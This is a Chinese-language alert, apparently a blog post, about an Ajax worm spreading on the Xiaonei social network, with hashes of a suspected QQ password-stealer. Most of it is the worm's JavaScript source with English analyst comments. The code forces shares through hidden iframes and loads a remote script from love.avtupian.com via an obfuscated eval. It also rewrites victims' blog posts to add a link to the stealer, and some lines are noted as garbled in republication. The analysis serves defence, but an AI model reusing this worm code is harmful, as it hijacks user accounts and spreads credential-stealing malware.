千橡国际 校内网 Ajax蠕虫大爆发!!!


千橡国际 校内网 Ajax蠕虫大爆发!!!

 

 


传播方式:Ajax蠕虫强制性分享一篇日志“十二星男女生爱情大骗术(哇咧~天秤好准~!!!>_<)”(URL:http://blog请勿访问.xiaonei.com/GetEntry.do?id=369970722&owner=229461699),并配合钓鱼(Phishing)。

特征:自动在日志中加入“最后推荐一个东西: 发现了好软件,QQ千里眼,能够强制与任何QQ视频,能够强制加好友,强制聊天,迫使下线!下载地址”
威胁:初步诊断为QQ盗号工具

解决方案:暂无。(由于暂时无法得到Javascript样本,所以无法解决。个人之力很难搞定,需要校内那边技术人员的配合)
替代方案:使用手机校内(因为手机不支持Ajax)


可执行文件MD5: 53d9b84d6a8aab02dfb94ea877f6e7ac

可执行文件大小:61,440  Bytes
开发语言:VB6.0
时间戳:0x4A20B8D0

 

 

Ajax蠕虫源代码

 

// Global error suppressor. Returning true from a window.onerror handler tells
// the browser the error has been handled, so any script failure in this
// payload produces no visible error prompt for the person viewing the page.
function killErrors() {return true;}
// Installed for the whole page, so it also hides errors from the site's own scripts.
window.onerror=killErrors;

// Tries to change the browser home page through the element passed in `aaa`.
// Relies on the Internet Explorer-only "#default#homepage" DHTML behavior and
// its setHomePage() method, so it has no effect in other browsers.
// The target is a Baidu URL carrying the tag tn=haijin0212_pg
// (presumably a referral/affiliate identifier; not confirmed by this page).
function defaul_home(aaa){
aaa.style.behavior='url(#default#homepage)';
aaa.setHomePage('http://www.baidu.com/index.php?tn=haijin0212_pg');
}

// Calls defaul_home(aaa) up to nine times (i = 1..9) while window.xxx is not 1,
// then sets window.xxx to 1 so that later calls do nothing.
// NOTE(review): `i` is never declared, so it is a global shared with the other
// loops in this listing.
// The only reference to hit() in this listing is the commented-out onclick hook
// that follows the function, so this home-page path looks disabled in this sample.
function hit(aaa){
     for(i=1;i<10;i++){
 if(window.xxx!=1){
     defaul_home(aaa);
         }    
     }
window.xxx=1;
}
//document.all.blogpage.onclick=Function("hit(document.all.blogpage)");

//----------------------------

// State for the forced-share stage.
// mydata: the form-encoded share payload, filled in by getinfo().
var mydata;
// Off-site page on love.avtupian.com, the same host this listing later uses
// for a script include and a hidden iframe.
// NOTE(review): getinfo() declares its own local `mylink`, so this global value
// is not what ends up inside mydata.
var mylink="http://love.avtupian.com/a/x/qiaoye.html";
// Runs as soon as the script is evaluated; works because function declarations are hoisted.
getinfo();

// Builds the share request body in the global `mydata`.
// Reads ten elements of the current page by id (link, type, title, pic, fromno,
// fromname, fromuniv, albumid, summary, largeurl) and concatenates them into
// "post=" followed by a percent-encoded JSON object: %7B%22link%22%3A%22 is {"link":" and
// each %22%2C%22...%22%3A%22 segment closes one value and opens the next key.
// Presumably these elements are fields embedded in the lure page; verify against the page markup.
// Nothing is returned; the result is consumed by appendjs().
function getinfo(){
var mylink=document.getElementById("link").value;
var mytype=document.getElementById("type").value;
var mytitle=document.getElementById("title").value;
var mypic=document.getElementById("pic").value;
var myfromno=document.getElementById("fromno").value;
var myfromname=document.getElementById("fromname").value;
var myfromuniv=document.getElementById("fromuniv").value;
var myalbumid=document.getElementById("albumid").value;
// innerText (not .value): the summary is read from element text rather than a form field.
var mysummary=document.getElementById("summary").innerText;
var mylargeurl=document.getElementById("largeurl").value;

// title, fromname, fromuniv and summary go through encodeURIComponent(); the
// remaining fields use the legacy escape().
mydata='post=%7B%22link%22%3A%22'+escape(mylink);
mydata+='%22%2C%22type%22%3A%22'+escape(mytype);
mydata+='%22%2C%22title%22%3A%22'+encodeURIComponent(mytitle);
mydata+='%22%2C%22pic%22%3A%22'+escape(mypic);
mydata+='%22%2C%22fromno%22%3A%22'+escape(myfromno);
mydata+='%22%2C%22fromname%22%3A%22'+encodeURIComponent(myfromname);
mydata+='%22%2C%22fromuniv%22%3A%22'+encodeURIComponent(myfromuniv);
mydata+='%22%2C%22albumid%22%3A%22'+escape(myalbumid);
mydata+='%22%2C%22largeurl%22%3A%22'+escape(mylargeurl);
// The visible code never appends the closing quote and brace of the JSON object.
mydata+='%22%2C%22summary%22%3A%22'+encodeURIComponent(mysummary);
// NOTE(review): as printed, the pattern on the next line is not a valid regex
// literal (the text after the first "//" reads as a comment). The republished
// listing appears to have lost an escape character; the '%2F' replacement
// suggests the intent was to percent-encode "/" characters. Treat this listing
// as a reference copy rather than a byte-exact sample.
mydata=mydata.replace(////g,'%2F');
}
// Appends a zero-size (invisible) iframe named do_it to the #logo element. Its
// source is ajaxProxy.html on the site's own share.xiaonei.com host.
// Analyst note: a 0x0 iframe added through innerHTML into page chrome is a useful
// indicator when reviewing stored content for this kind of injection.
document.getElementById("logo").innerHTML+='<iframe name=do_it id=do_it src="http://share.xiaonei.com/ajaxProxy.html?ver=2" width=0 height=0></iframe>';
// String form of setTimeout: the string is evaluated as code after 2600 ms
// (presumably to give the iframe time to load).
setTimeout("appendjs()",2600);

// Overwrites the <body> of the do_it iframe with two elements:
//   1. an <img> whose src is http://r.dd/EE?E=<random>; its onerror handler passes a
//      String.fromCharCode(...) sequence to eval(). The image is presumably expected
//      to fail to load so that onerror fires.
//   2. a <div id=eer> holding the share payload built by getinfo() (mydata).
// Decoded, the character codes create a <script> element with type text/javascript and
// src hxxp://love[.]avtupian[.]com/a/x/s.jpg and append it to the document <head>:
// a remote script served under an image file extension. That script is not
// reproduced on this page.
// document.frames(...) is an Internet Explorer-only collection.
// Analyst note: eval(String.fromCharCode(...)) inside an onerror attribute and a script
// include ending in .jpg are both recognisable signatures for content filters and log review.
function appendjs(){
document.frames("do_it").document.getElementsByTagName("body").item(0).innerHTML='<img src="http://r.dd/EE?E='+Math.random()+'" onerror="eval(String.fromCharCode(118,97,114,32,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,13,10,115,46,115,114,99,61,39,104,116,116,112,58,47,47,108,111,118,101,46,97,118,116,117,112,105,97,110,46,99,111,109,47,97,47,120,47,115,46,106,112,103,39,59,13,10,115,46,116,121,112,101,61,39,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,39,59,13,10,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,46,105,116,101,109,40,48,41,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,13,10))"><div id=eer name=eer>'+mydata+'</div>';
}
//===============================================================================================

// Shared globals for the blog-rewriting stage. The functions below communicate
// through these rather than through parameters and return values.
var mytitle;var mybody;var mytsc;var myid;var userurl;var guest;var targetblogurlid="0";
var myblogurl=new Array();var myblogid=new Array();var b_index;
var guest2;

// visitorID: taken from the href of the first nested link under #logo, i.e. everything
// after "?id=". Presumably this link identifies the logged-in viewer; confirm against
// the site markup. $() is a helper defined elsewhere (the later use of Ajax.Request
// suggests Prototype.js; not confirmed here).
        var visitorID=$("logo").firstChild.firstChild.href;
 var IDs=visitorID.indexOf("?id=");
 visitorID=visitorID.substring(IDs+4);
        var mydomain=document.location.href;
 var mydomaint=mydomain.indexOf("blog.xiaonei.com");
 var myo=mydomain.indexOf(visitorID);
// Continue only on blog.xiaonei.com pages whose URL does not contain the viewer's
// own id (presumably: the viewer is reading someone else's entry). The next stage is
// scheduled 400 ms later through the string (eval-like) form of setTimeout.
 if(mydomaint!=-1&&myo==-1){setTimeout("get_my_blogurl()",400);}

// Requests http://blog.xiaonei.com/MyBlog.do with GET through Ajax.Request (defined
// outside this listing) and returns the request object.
// add_my_blogurl is registered for both onComplete and onFailure, so it runs
// whether or not the request succeeds.
// The request is issued from the viewer's browser, so presumably it carries the
// viewer's session and returns the viewer's own blog list.
function get_my_blogurl(){
  var as=new Ajax.Request("http://blog.xiaonei.com/MyBlog.do",{method:"get",onComplete:add_my_blogurl,onFailure:add_my_blogurl});
  return as;
 }
// Response handler for get_my_blogurl(). Scans r.responseText for up to ten
// entry links and records them in the globals myblogurl[] and myblogid[], then
// hands over to get_my_testself().
// r: the response object supplied by Ajax.Request; only r.responseText is read.
// NOTE(review): the loop counter `i` is an undeclared global.
function add_my_blogurl(r){
  var mybloglist=r.responseText;
  var myurls;var blogids;var blogide;
  for(i=0;i<10;i++){
     // Marker that precedes each entry link in the returned HTML.
     myurls=mybloglist.indexOf('<strong><a href="http://blog.xiaonei.com/GetEntry.do?id=');
     //mybloglist=mybloglist.substring(myurls+10);
     //myurls=mybloglist.indexOf('<strong><a href="http://blog.xiaonei.com/GetEntry.do?id=');
     if(myurls!=-1){
      // Cut to the marker, skip past the opening quote of href, then read up to the closing quote.
      mybloglist=mybloglist.substring(myurls);
      myurls=mybloglist.indexOf('"');
      mybloglist=mybloglist.substring(myurls+1);
      myurls=mybloglist.indexOf('"');
      // substring(0,myurls-1) leaves out the last character before the closing quote.
      myblogurl[i]=mybloglist.substring(0,myurls-1);mybloglist=mybloglist.substring(myurls+1);
      // The entry id is the text between "?id=" and "&owner" in the extracted URL.
      blogids=myblogurl[i].indexOf("?id=");blogide=myblogurl[i].indexOf("&owner");
      myblogid[i]=myblogurl[i].substring(blogids+4,blogide);   
      //document.getElementById("blogContent").innerHTML+="<br><a href=eee.com >i="+i+";</a>"+myblogid[i];
 
     }else{break;}
  }
  get_my_testself();
}
//-------------------------------------

// Picks one of the collected entries to modify. For each id in myblogid[] it
// fetches the entry's edit page synchronously and looks for the string "skycn" in
// the response. "skycn" appears in the link text that add_my_form() appends, so it
// works as an already-modified marker. The first entry without the marker becomes
// targetblogurlid, and add_my_form() is called for it.
// Analyst note: the same marker string can be used to find entries that were
// already altered.
function get_my_testself(){
 targetblogurlid=0;
  for(i=0;i<myblogid.length;i++){
      //var url="http://blog.xiaonei.com/GetEntry.do?id="+myblogid[i]+"&owner="+visitorID;
      var url="http://blog.xiaonei.com/EditEntry.do?id="+myblogid[i];
      var xhr2=createXMLHttpRequest();
      if(xhr2){
              // Third argument false = synchronous request; the page blocks until it returns.
              xhr2.open("GET",url,false);
              xhr2.send();guest2=xhr2.responseText;
        }
      // guest2 is a global; if no request object was created it keeps its previous value.
      var mycheckit=guest2.indexOf("skycn");
      if(mycheckit==-1){targetblogurlid=myblogid[i];b_index=i;break;}
   }
   if(targetblogurlid!=0){add_my_form(targetblogurlid);}
}
//---------------------------------------------------------------add--form
// Extracts the existing title and body from the edit-page HTML held in the global
// guest2, appends the lure paragraph to the body, and stores both URI-encoded in the
// globals mytitle and mybody before calling myxiugai().
// r: the target entry id passed by the caller; it is not used inside this function.
function add_my_form(r){
guest=guest2;
// Title: the text between value=" and the first '" />' after name="title".
var texts=guest.indexOf('name="title"');
guest=guest.substring(texts);

var titles=guest.indexOf('value="');
var titlee=guest.indexOf('" />');
mytitle=guest.substring(titles+7,titlee);
// Undo the HTML entity encoding of the edit form.
// NOTE(review): &quot; is replaced by '/"' (slash + quote) as printed; this may be
// another escape character lost when the listing was republished.
mytitle=mytitle.replace(/&amp;/g,'&').replace(/&quot;/g,'/"').replace(/&lt;/g,'<').replace(/&gt;/g,'>').replace(/&#034;/g,'"');
mytitle=encodeURI(mytitle);
guest=guest.substring(titlee);

// Body: text from 30 characters after name="body" up to </textarea>. The fixed
// offset presumably skips the rest of the opening textarea tag; it depends on the
// exact site markup.
var bodys=guest.indexOf('name="body"');
var bodye=guest.indexOf('</textarea>');
mybody=guest.substring(bodys+30,bodye);
mybody=mybody.replace(/&amp;/g,'&').replace(/&quot;/g,'/"').replace(/&lt;/g,'<').replace(/&gt;/g,'>').replace(/&#034;/g,'"');

// Appended lure: a "recommended software" paragraph linking to a RAR archive on
// tan.itwenba.cn. The link text contains "skycn", the marker that
// get_my_testself() checks for.
mybody+='<p><br>最后推荐一个东西:<br><br>发现了好软件,QQ千里眼,能够强制与任何QQ视频,能够强制加好友,强制聊天,迫使下线!<br>下载地址:<a href="http://tan.itwenba.cn/qq/QQqianliyan.rar" target=_blank >天空下载中心:skycn</a></p>';
mybody=encodeURI(mybody);

myxiugai();
 }

// Submits the modified entry: a synchronous form-encoded POST to EditEntry.do built
// from the globals mytitle, mybody, visitorID and targetblogurlid.
// The visible parameter list contains no per-request token, so as far as this
// listing shows nothing in the request distinguishes a script-issued edit from one
// the account owner made. Requiring an unpredictable per-session token on this
// endpoint is the usual server-side control for that gap.
function myxiugai(){
userurl="http://blog.xiaonei.com/EditEntry.do";
var fdata="title="+mytitle+"&body="+mybody+"&categoryId=0&blogControl=99&passwordProtedted=0&passWord=&blog_pic_id=0&pic_path=&owner="+visitorID+"&relative_optype=&id="+targetblogurlid;
var xhr=createXMLHttpRequest();
// NOTE(review): as printed, the pattern on the next line is not a valid regex
// literal (the text after the first "//" reads as a comment); the republished
// listing appears to have lost an escape character. The '%2F' replacement
// suggests the intent was to percent-encode "/" characters.
fdata=fdata.replace(////g,'%2F');
// Strip encoded tabs and CRLF pairs from the form body.
fdata=fdata.replace(/%09/g,'');
fdata=fdata.replace(/%0D%0A/g,'');

if(xhr){
  // Third argument false = synchronous request.
  xhr.open("POST",userurl,false);
  xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
  xhr.send(fdata);
  }
}

//--------------------------------
// Returns an HTTP request object, or null if none could be created.
// Uses the native XMLHttpRequest when window.XMLHttpRequest exists; otherwise tries
// a list of ActiveX ProgIDs in order and keeps the first that instantiates.
function createXMLHttpRequest(){
    var XMLhttpObject=null;   
    if (window.XMLHttpRequest) {XMLhttpObject = new XMLHttpRequest()}  
    else   
      { var MSXML=['Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP','MSXML.XMLHTTP', 'MICROSOFT.XMLHTTP.1.0','MICROSOFT.XMLHTTP.1', 'Microsoft.XMLHTTP'];        
        for(var i=0;i<MSXML.length;i++)  
        {  
            try 
            {  
                XMLhttpObject=new ActiveXObject(MSXML[i]);  
                break;  
            }  
            // Deliberately empty: a failed ProgID just moves on to the next one.
            catch (ex) { 
            }
         }  
      }
return XMLhttpObject;
}
//---------------------------------------
// Schedules myshua() 200 ms after load through the string (eval-like) form of setTimeout.
setTimeout("myshua()",200);
// Adds a zero-size iframe that loads ip.asp from love.avtupian.com inside the
// #optiondropdownMenu element. Every browser that runs this script therefore makes
// a request to that host; presumably this is a hit counter or visitor log for the
// operator (the server side is not shown on this page).
// Analyst note: outbound requests to this host from pages on the affected site are a
// network-level indicator that the script ran.
function myshua(){
document.getElementById("optiondropdownMenu").insertAdjacentHTML("beforeend","<iframe width=0 height=0 src='http://love.avtupian.com/ip.asp'></iframe>");
}

 
